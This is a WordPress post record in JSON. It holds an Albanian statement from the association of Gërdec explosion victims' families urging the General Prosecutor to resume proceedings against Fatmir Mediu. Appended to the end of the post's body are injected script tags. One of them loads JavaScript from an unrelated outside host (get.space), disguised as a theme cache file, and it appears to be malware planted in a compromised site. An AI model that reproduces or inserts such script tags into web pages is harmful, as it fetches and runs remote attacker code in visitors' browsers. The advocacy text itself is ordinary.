{"id":350,"date":"2013-02-25T21:15:08","date_gmt":"2013-02-25T21:15:08","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=350"},"modified":"2014-10-07T10:45:12","modified_gmt":"2014-10-07T08:45:12","slug":"deklarate-e-shoqates-se-familjareve-te-viktimave-te-gerdecit","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=350","title":{"rendered":"Deklarat\u00eb e Shoqat\u00ebs s\u00eb familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit"},"content":{"rendered":"<p>Shoqata e familjar\u00ebve t\u00eb shp\u00ebrthmit t\u00eb G\u00ebrdecit i \u00ebsht\u00eb drejtuar disa her\u00eb Prokuroris\u00eb s\u00eb P\u00ebrgjithshme p\u00ebr t\u2019i k\u00ebrkuar vijimin e procedimit penal ndaj t\u00eb pandehurit Fatmir Mediu.<\/p>\n<p>Si\u00e7 jeni n\u00eb dijeni, n\u00eb dat\u00ebn 14 shtator 2009 Gjykata e Lart\u00eb vendosi pushimin e \u00e7\u00ebshtjes penale ndaj shtetasit Fatmir Mediu, meq\u00ebn\u00ebse ky i fundit rifitoi imunitet parlamentar si deputet n\u00eb Kuvendin e Shqip\u00ebris\u00eb.<\/p>\n<p>\u00cbsht\u00eb e qart\u00eb q\u00eb Prokuroria e P\u00ebrgjithshme \u00ebsht\u00eb e detyruar t\u00eb nis\u00eb s\u00ebrish \u00a0procedimin ndaj shtetasit F. Mediu, si personi i vet\u00ebm nga lista e hetimeve t\u00eb Prokuroris\u00eb q\u00eb nuk \u00ebsht\u00eb gjykuar p\u00ebr ngjarjen e G\u00ebrdecit.<\/p>\n<p>Pavar\u00ebsisht k\u00ebrkesave tona t\u00eb p\u00ebrs\u00ebritura, detyrimit ligjor dhe impenjimit me integritet moral q\u00eb duhet t\u00eb ket\u00eb vet\u00eb institucioni, kjo situat\u00eb ka mbetur pezull prej 3 vitesh e gjys\u00ebm.<\/p>\n<p>P\u00ebrve\u00e7 Shoqat\u00ebs s\u00eb familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit, apelim ndaj k\u00ebtij instucioni ka b\u00ebr\u00eb edhe ambasadori amerikan, z. Aleksand\u00ebr Arvizu, i cili ka k\u00ebrkuar shprehimisht procedimin e personave tanim\u00eb pa imunitet, si\u00e7 edhe njihet rasti i z. Fatmir Mediu.<\/p>\n<p>Vullnet p\u00ebr heqjen e imuniteteve dhe gatishm\u00ebri p\u00ebr procedimin e p\u00ebrgjegj\u00ebsve ka shprehur edhe kreu i qeveris\u00eb z. Sali Berisha. Edhe vet\u00eb i akuzuari Fatmir Mediu \u00ebsht\u00eb shprehur se do t\u00eb donte t\u00eb vihej p\u00ebrball\u00eb drejt\u00ebsis\u00eb.<\/p>\n<p>Drejtuesi i Prokuroris\u00eb s\u00eb P\u00ebrgjithshme, z. Adriatik Llalla \u00ebsht\u00eb shprehur n\u00eb media se do t\u00eb ndjek\u00eb me prioritet \u00e7\u00ebshtjen e njohur si shp\u00ebrthimi i G\u00ebrdecit.<\/p>\n<p>N\u00eb k\u00ebto kushte nuk shohim asnj\u00eb arsye logjike p\u00ebrse ligji nuk duhet t\u00eb respektohet p\u00ebr nj\u00eb individ, q\u00eb p\u00ebr m\u00eb tep\u00ebr nuk g\u00ebzon m\u00eb as imunitet nga ndjekja penale.<\/p>\n<p>Z. Llalla, do t\u00eb ishte n\u00eb nderin e institucionit q\u00eb Ju drejtoni, q\u00eb t\u00eb \u00e7oni p\u00ebrpara drejt\u00ebsis\u00eb \u00e7do subjekt q\u00eb akuza e ka gjetur t\u00eb arsyeshme. Keni detyrimin p\u00ebr t\u00eb vepruar n\u00eb k\u00ebt\u00eb m\u00ebnyr\u00eb n\u00eb p\u00ebrputhje me misionin Tuaj kushtetues.<\/p>\n<p>Respektojeni at\u00eb.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Shoqata e familjar\u00ebve t\u00eb shp\u00ebrthmit t\u00eb G\u00ebrdecit i \u00ebsht\u00eb drejtuar disa her\u00eb Prokuroris\u00eb s\u00eb P\u00ebrgjithshme p\u00ebr t\u2019i k\u00ebrkuar vijimin e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":351,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/350"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=350"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/350\/revisions"}],"predecessor-version":[{"id":352,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/350\/revisions\/352"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/351"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}